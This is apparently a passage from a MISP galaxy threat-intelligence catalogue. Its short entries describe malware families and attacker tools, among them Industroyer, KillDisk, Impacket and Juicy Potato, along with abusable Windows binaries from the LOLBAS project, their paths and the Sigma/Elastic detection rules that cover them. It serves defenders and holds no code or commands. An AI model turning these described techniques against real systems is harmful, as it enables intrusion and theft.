in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5119 |
source | Tidal Cyber |
tags | ['8bcce456-e1dc-4dd0-99a9-8334fd6f2847', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
IMAPLoader
IMAPLoader is a .NET downloader that uses email-based channels for command and control communication. It is believed to be developed and used by Yellow Liderc a threat actor group based in Iran and aligned with the Iranian Islamic Revolutionary Guard Corp (IRGC). IMAPLoader is delivered via drive-by compromises and phishing attacks.[PwC Yellow Liderc October 25 2023]
Internal MISP references
UUID 0832ffda-240a-4455-a53b-71b2683bea09
which can be used as unique global reference for IMAPLoader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5308 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
IMEWDBLD
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft IME Open Extended Dictionary Module
Author: Wade Hickey
Paths: * C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
Resources: * https://twitter.com/notwhickey/status/1367493406835040265
Detection: * Sigma: net_connection_win_imewdbld.yml[IMEWDBLD.exe - LOLBAS Project]
Internal MISP references
UUID 2ef7c673-a0dc-4773-a9fd-337ed68d9b0b
which can be used as unique global reference for IMEWDBLD
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5115 |
source | Tidal Cyber |
tags | ['796962fe-56d7-4816-9193-153da0be7c10', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Imminent Monitor
Imminent Monitor was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.[Imminent Unit42 Dec2019]
Internal MISP references
UUID 925fc0db-9315-4703-9353-1d0e9ecb1439
which can be used as unique global reference for Imminent Monitor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0434 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Impacket
Impacket is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. Impacket contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.[Impacket Tools]
Internal MISP references
UUID cf2c5666-e8ad-49c1-ac8f-30ed65f9e52c
which can be used as unique global reference for Impacket
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0357 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', '61cdbb28-cbfd-498b-9ab1-1f14337f9524', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '6a80006a-ff1c-48e8-bb6f-d109d7b7a2fc', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '4d767e87-4cf6-438a-927a-43d2d0beaab7', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Industroyer
Industroyer is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.[ESET Industroyer] Industroyer was used in the attacks on the Ukrainian power grid in December 2016.[Dragos Crashoverride 2017] This is the first publicly known malware specifically designed to target and impact operations in the electric grid.[Dragos Crashoverride 2018]
Internal MISP references
UUID 09398a7c-aee5-44af-b99d-f73d3b39c299
which can be used as unique global reference for Industroyer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0604 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '37dff778-95a6-4e51-a26a-1d399ef713be'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Industroyer2
Industroyer2 is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in Industroyer. Security researchers assess that Industroyer2 was designed to cause impact to high-voltage electrical substations. The initial Industroyer2 sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.[Industroyer2 Blackhat ESET]
Internal MISP references
UUID 53c5fb76-a690-55c3-9e02-39577990da2a
which can be used as unique global reference for Industroyer2
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S1072 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '37dff778-95a6-4e51-a26a-1d399ef713be'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Infdefaultinstall
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary used to perform installation based on content inside inf files
Author: Oddvar Moe
Paths: * C:\Windows\System32\Infdefaultinstall.exe * C:\Windows\SysWOW64\Infdefaultinstall.exe
Resources: * https://twitter.com/KyleHanslovan/status/911997635455852544 * https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Detection: * Sigma: proc_creation_win_infdefaultinstall_execute_sct_scripts.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[Infdefaultinstall.exe - LOLBAS Project]
Internal MISP references
UUID e35b5513-4370-4f8c-b3a6-1f64c65f1e85
which can be used as unique global reference for Infdefaultinstall
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5120 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
InnaputRAT
InnaputRAT is a remote access tool that can exfiltrate files from a victim’s machine. InnaputRAT has been seen out in the wild since 2016. [ASERT InnaputRAT April 2018]
Internal MISP references
UUID e42bf572-1e70-4467-a4b7-5e22c776c758
which can be used as unique global reference for InnaputRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0259 |
source | MITRE |
type | ['malware'] |
Installutil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Resources: * https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 * https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md * https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool
Detection: * Sigma: proc_creation_win_instalutil_no_log_execution.yml * Sigma: proc_creation_win_lolbin_installutil_download.yml * Elastic: defense_evasion_installutil_beacon.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml[LOLBAS Installutil]
Internal MISP references
UUID c983bb77-b96c-44d5-b3f8-2540d7c604db
which can be used as unique global reference for Installutil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5121 |
source | Tidal Cyber |
tags | ['a3f84674-3813-4993-9e34-39cdaa19cbd1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Interactsh
According to joint Cybersecurity Advisory AA23-250A (September 2023), Interactsh is "an open-source tool for detecting external interactions (communication)". The Advisory further states that the tool is "used to detect callbacks from target systems for specified vulnerabilities and commonly used during the reconnaissance stages of adversary activity".[U.S. CISA Zoho Exploits September 7 2023]
Internal MISP references
UUID 9ec3777d-9a36-4822-a3e2-a7ce5d296309
which can be used as unique global reference for Interactsh
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5049 |
source | Tidal Cyber |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee'] |
type | ['tool'] |
Inveigh
Inveigh is an open-source utility. According to its GitHub project page, it is a "machine-in-the-middle" tool designed for penetration testing purposes.[GitHub Inveigh]
Internal MISP references
UUID 5658f260-8e96-4fa5-9863-189660048e5d
which can be used as unique global reference for Inveigh
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5272 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
InvisiMole
InvisiMole is a modular spyware program that has been used by the InvisiMole Group since at least 2013. InvisiMole has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. Gamaredon Group infrastructure has been used to download and execute InvisiMole against a small number of victims.[ESET InvisiMole June 2018][ESET InvisiMole June 2020]
Internal MISP references
UUID 3ee4c49d-2f2c-4677-b193-69f16f2851a4
which can be used as unique global reference for InvisiMole
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0260 |
source | MITRE |
type | ['malware'] |
Invoke-PSImage
Invoke-PSImage takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. [GitHub Invoke-PSImage]
Internal MISP references
UUID 2200a647-3312-44c0-9691-4a26153febbb
which can be used as unique global reference for Invoke-PSImage
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0231 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
IOBit
IOBit is a self-described "freeware" tool that can ostensibly be used to "clean, optimize, speed up and secure" personal computers. According to U.S. cybersecurity authorities, IOBit has been used by adversaries, such as ransomware actors, as part of their operations, for example to disable anti-virus software.[U.S. CISA Play Ransomware December 2023]
Internal MISP references
UUID 9c955014-2d83-4b5b-9127-cfc49e86779f
which can be used as unique global reference for IOBit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5080 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
ipconfig
ipconfig is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. [TechNet Ipconfig]
Internal MISP references
UUID 4f519002-0576-4f8e-8add-73ebac9a86e6
which can be used as unique global reference for ipconfig
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0100 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
IronNetInjector
IronNetInjector is a Turla toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including ComRAT.[Unit 42 IronNetInjector February 2021 ]
Internal MISP references
UUID 9ca96281-8ff9-4619-a79d-16c5a9594eae
which can be used as unique global reference for IronNetInjector
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0581 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
ISMInjector
ISMInjector is a Trojan used to install another OilRig backdoor, ISMAgent. [OilRig New Delivery Oct 2017]
Internal MISP references
UUID 752ab0fc-7fa1-4e54-bd9a-7a280a38ed77
which can be used as unique global reference for ISMInjector
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0189 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ixeshe
Ixeshe is a malware family that has been used since at least 2009 against targets in East Asia. [Moran 2013]
Internal MISP references
UUID 6dbf31cf-0ba0-48b4-be82-38889450845c
which can be used as unique global reference for Ixeshe
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0015 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Jaguar Tooth
Jaguar Tooth is a malicious software bundle consisting of a series of payloads and patches. Russia-backed APT28 used Jaguar Tooth during a series of compromises involving vulnerable Cisco routers belonging to U.S., Ukrainian, and other entities in 2021.[U.S. CISA APT28 Cisco Routers April 18 2023]
According to an April 2023 UK National Cyber Security Centre technical report on Jaguar Tooth, the malware is deployed and executed via exploitation of CVE-2017-6742, a Simple Network Management Protocol (SNMP) vulnerability for which Cisco released a patch in 2017. Jaguar Tooth deployments allowed actors to collect further device information via execution of Cisco IOS Command Line Interface commands, discover other network devices, and achieve unauthenticated backdoor access to victim systems.[UK NCSC Jaguar Tooth April 18 2023]
Related Vulnerabilities: CVE-2017-6742[U.S. CISA APT28 Cisco Routers April 18 2023]
Internal MISP references
UUID 0eb47e25-56ec-42ba-9850-e50450b853e0
which can be used as unique global reference for Jaguar Tooth
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Network'] |
software_attack_id | S5061 |
source | Tidal Cyber |
tags | ['b20e7912-6a8d-46e3-8e13-9a3fc4813852', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '15787198-6c8b-4f79-bf50-258d55072fee', 'f01290d9-7160-44cb-949f-ee4947d04b6f', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Janicab
Janicab is an OS X trojan that relied on a valid developer ID and oblivious users to install it. [Janicab]
Internal MISP references
UUID a4debf1f-8a37-4c89-8ebc-31de71d33f79
which can be used as unique global reference for Janicab
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0163 |
source | MITRE |
type | ['malware'] |
Javali
Javali is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.[Securelist Brazilian Banking Malware July 2020]
Internal MISP references
UUID 853d3d18-d746-4650-a9bd-c36a0e86dd02
which can be used as unique global reference for Javali
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0528 |
source | MITRE |
type | ['malware'] |
JCry
JCry is ransomware written in Go. It was identified as apart of the #OpJerusalem 2019 campaign.[Carbon Black JCry May 2019]
Internal MISP references
UUID 41ec0bbc-65ca-4913-a763-1638215d7b2f
which can be used as unique global reference for JCry
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0389 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
JHUHUGIT
JHUHUGIT is malware used by APT28. It is based on Carberp source code and serves as reconnaissance malware. [Kaspersky Sofacy] [F-Secure Sofacy 2015] [ESET Sednit Part 1] [FireEye APT28 January 2017]
Internal MISP references
UUID d50ef3fc-7d1c-4a82-b1cf-2319d83da3ae
which can be used as unique global reference for JHUHUGIT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0044 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
JPIN
JPIN is a custom-built backdoor family used by PLATINUM. Evidence suggests developers of JPIN and Dipsind code bases were related in some way. [Microsoft PLATINUM April 2016]
Internal MISP references
UUID c96fce69-6b9c-4bbc-bb42-f6a8fb6eb88f
which can be used as unique global reference for JPIN
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0201 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
jRAT
jRAT is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of jRAT have been distributed via a software-as-a-service platform, similar to an online subscription model.[Kaspersky Adwind Feb 2016] [jRAT Symantec Aug 2018]
Internal MISP references
UUID 42fe9795-5cf6-4ad7-b56e-2aa655377992
which can be used as unique global reference for jRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Android', 'Windows'] |
software_attack_id | S0283 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Jsc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
Resources: * https://twitter.com/DissectMalware/status/998797808907046913 * https://www.phpied.com/make-your-javascript-a-windows-exe/
Detection: * Sigma: proc_creation_win_lolbin_jsc.yml * IOC: Jsc.exe should normally not run a system unless it is used for development.[Jsc.exe - LOLBAS Project]
Internal MISP references
UUID 1c67bf0b-22f8-4f57-8f91-f15b4923455f
which can be used as unique global reference for Jsc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5122 |
source | Tidal Cyber |
tags | ['ee16a0c7-b3cf-4303-9681-b3076da9bff0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
JSS Loader
JSS Loader is Remote Access Trojan (RAT) with .NET and C++ variants that has been used by FIN7 since at least 2020.[eSentire FIN7 July 2021][CrowdStrike Carbon Spider August 2021]
Internal MISP references
UUID c67f3029-a26c-4752-b7f1-8e3369c2f79d
which can be used as unique global reference for JSS Loader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0648 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Juicy Potato
Juicy Potato is an open-source software project that, according to its GitHub page, can be used for privilege escalation purposes.[GitHub ohpe Juicy Potato]
Internal MISP references
UUID 57e9c32b-a1fa-45bc-9a57-098834a2c356
which can be used as unique global reference for Juicy Potato
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5303 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
KARAE
KARAE is a backdoor typically used by APT37 as first-stage malware. [FireEye APT37 Feb 2018]
Internal MISP references
UUID ca883d21-97ca-420d-a66b-ef19a8355467
which can be used as unique global reference for KARAE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0215 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Kasidet
Kasidet is a backdoor that has been dropped by using malicious VBA macros. [Zscaler Kasidet]
Internal MISP references
UUID 1896b9c9-a93e-4220-b4c2-6c4c9c5ca297
which can be used as unique global reference for Kasidet
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0088 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Kazuar
Kazuar is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. [Unit 42 Kazuar May 2017]
Internal MISP references
UUID e93990a0-4841-4867-8b74-ac2806d787bf
which can be used as unique global reference for Kazuar
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Windows'] |
software_attack_id | S0265 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Kerrdown
Kerrdown is a custom downloader that has been used by APT32 since at least 2018 to install spyware from a server on the victim's network.[Amnesty Intl. Ocean Lotus February 2021][Unit 42 KerrDown February 2019]
Internal MISP references
UUID 17c28e46-1005-4737-8567-d4ad9f1aefd1
which can be used as unique global reference for Kerrdown
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0585 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Kessel
Kessel is an advanced version of OpenSSH which acts as a custom backdoor, mainly acting to steal credentials and function as a bot. Kessel has been active since its C2 domain began resolving in August 2018.[ESET ForSSHe December 2018]
Internal MISP references
UUID 32f1e0d3-753f-4b51-aec5-cfaa393cedc3
which can be used as unique global reference for Kessel
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0487 |
source | MITRE |
type | ['malware'] |
Kevin
Kevin is a backdoor implant written in C++ that has been used by HEXANE since at least June 2020, including in operations against organizations in Tunisia.[Kaspersky Lyceum October 2021]
Internal MISP references
UUID b9730d7c-aa57-4d6f-9125-57dcb65b02e0
which can be used as unique global reference for Kevin
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1020 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
KeyBoy
KeyBoy is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.[CitizenLab KeyBoy Nov 2016][PWC KeyBoys Feb 2017]
Internal MISP references
UUID 6ec39371-d50b-43b6-937c-52de00491eab
which can be used as unique global reference for KeyBoy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0387 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Keydnap
This piece of malware steals the content of the user's keychain while maintaining a permanent backdoor [OSX Keydnap malware].
Internal MISP references
UUID aefbe6ff-7ce4-479e-916d-e8f0259d81f6
which can be used as unique global reference for Keydnap
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0276 |
source | MITRE |
type | ['malware'] |
KEYMARBLE
KEYMARBLE is a Trojan that has reportedly been used by the North Korean government. [US-CERT KEYMARBLE Aug 2018]
Internal MISP references
UUID a644f61e-6a9b-41ab-beca-72518351c27f
which can be used as unique global reference for KEYMARBLE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0271 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
KEYPLUG
KEYPLUG is a modular backdoor written in C++, with Windows and Linux variants, that has been used by APT41 since at least June 2021.[Mandiant APT41]
Internal MISP references
UUID ba9e56b9-7904-5ec8-bb39-7f82f7b2e89a
which can be used as unique global reference for KEYPLUG
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S1051 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
KGH_SPY
KGH_SPY is a modular suite of tools used by Kimsuky for reconnaissance, information stealing, and backdoor capabilities. KGH_SPY derived its name from PDB paths and internal names found in samples containing "KGH".[Cybereason Kimsuky November 2020]
Internal MISP references
UUID c1e1ab6a-d5ce-4520-98c5-c6df41005fd9
which can be used as unique global reference for KGH_SPY
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0526 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
KillDisk
KillDisk is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of BlackEnergy malware during cyber attacks against Ukraine in 2015. KillDisk has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some KillDisk variants.[KillDisk Ransomware][ESEST Black Energy Jan 2016][Trend Micro KillDisk 1][Trend Micro KillDisk 2]
Internal MISP references
UUID b5532e91-d267-4819-a05d-8c5358995add
which can be used as unique global reference for KillDisk
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0607 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Kinsing
Kinsing is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. [Aqua Kinsing April 2020][Sysdig Kinsing November 2020][Aqua Security Cloud Native Threat Report June 2021]
Internal MISP references
UUID 7b4f157c-4b34-4f55-9c20-ff787495e9ba
which can be used as unique global reference for Kinsing
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Containers'] |
software_attack_id | S0599 |
source | MITRE |
tags | ['efa33611-88a5-40ba-9bc4-3d85c6c8819b', '8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e'] |
type | ['malware'] |
Kivars
Kivars is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by BlackTech in a 2010 campaign.[TrendMicro BlackTech June 2017]
Internal MISP references
UUID 673ed346-9562-4997-80b2-e701b1a99a58
which can be used as unique global reference for Kivars
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0437 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Koadic
Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. Koadic has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.[Github Koadic][Palo Alto Sofacy 06-2018][MalwareBytes LazyScripter Feb 2021]
Internal MISP references
UUID 5e981594-d00a-4c7f-8ed0-3d4a60cc3fcd
which can be used as unique global reference for Koadic
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
